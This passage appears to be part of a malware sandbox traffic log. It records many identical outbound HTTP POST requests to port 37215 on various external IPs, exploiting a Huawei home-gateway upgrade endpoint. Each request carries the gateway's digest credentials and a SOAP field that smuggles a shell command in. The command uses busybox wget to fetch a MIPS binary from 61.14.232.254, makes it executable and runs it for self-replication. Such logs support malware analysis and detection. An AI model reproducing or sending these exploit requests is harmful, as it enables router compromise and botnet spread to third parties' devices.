                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1762192.168.2.1338274157.175.97.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629719973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1763192.168.2.134923641.141.141.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629770994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1764192.168.2.1352876197.203.195.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629792929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1765192.168.2.1342666157.35.109.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629812002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1766192.168.2.1347956157.104.111.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629861116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1767192.168.2.135001241.162.162.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629897118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1768192.168.2.1336666199.237.63.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.629911900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1769192.168.2.1359478168.94.210.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630002975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1770192.168.2.1353492197.72.212.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630016088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1771192.168.2.135932054.126.225.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630049944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
